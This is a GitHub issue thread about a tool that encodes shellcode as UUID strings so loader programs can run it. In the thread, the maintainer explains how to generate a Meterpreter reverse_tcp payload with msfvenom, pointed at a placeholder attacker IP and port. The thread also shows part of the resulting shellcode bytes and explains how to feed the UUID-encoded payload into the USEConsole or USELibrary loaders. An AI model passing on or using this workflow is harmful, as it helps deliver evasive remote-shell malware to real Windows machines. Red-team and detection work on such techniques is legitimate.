### ISSUE TITLE
Convert the shellcode into UUID

### ISSUE THREAD

**Issue by avi8892** [ChoiSG/UuidShellcodeExec#5]
I'm trying to convert Meterpreter shellcode into UUID, unsuccessfully. Do you mind giving an example of how to convert it? 

![image](https://user-images.githubusercontent.com/31028818/115382566-853ace00-a1dd-11eb-9be9-0cc27e81b058.png)

**Comment by ChoiSG** [comment]
Based on the error message, there is inconsistent use of tabs and spaces for indentation for `shellcodeToUUID.py`. Make sure to either use only tabs or only spaces. This is a very common error when modifying python source code.

For USEConsole and USELibrary, the `buf` variable needs to be filled with UUID Strings, not just byte array. So make sure to 1) fix  `shellcodeToUUID.py`'s tab/indentation problem 2) Run  `shellcodeToUUID.py` and get UUID string, 3) then copy paste that UUID string to USEConsole or USELibrary.

**Comment by avi8892** [comment]
@ChoiSG I totally understand the steps. Lets leave the tabs/spaces behind. Can you look at the image, and tell me if the buf format is correct? Or can you provide an example,  how you used the MessageBox shell inside the script itself ?

**Comment by ChoiSG** [comment]
Yes, I already told you that the buf format is incorrect. "For USEConsole and USELibrary, the buf variable needs to be filled with UUID Strings, not just byte array" - from the previous comment. You were putting bytearray because your python script failed due to tab/spaces, hence that's why I focused on that. 

Steps to use MessageBox shell inside the script are commented in shellcodetouuid.py file. 

1. Create msfvenom shellcode 
`msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=<IP> lport=<port> -f python` 

2. Copy/Paste the msfvenom shellcode into shellcodetouuid.py file 
```
def main():
	# Copy/Paste the MessageBox payload here. buf = <shellcode> 
	buf =  b""
	buf += b"\xfc\x48\x83\xe4\xf0\xe8\xcc\x00\x00\x00\x41\x51\x41"
	buf += b"\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48"
	buf += b"\x8b\x52\x18\x48\x8b\x52\x20\x48\x0f\xb7\x4a\x4a\x4d"
	.... <SNIP> .... 
```
3. Run shellcodetouuid.py 
4. Copy/paste the UUID string into USEConsole or USELibrary.
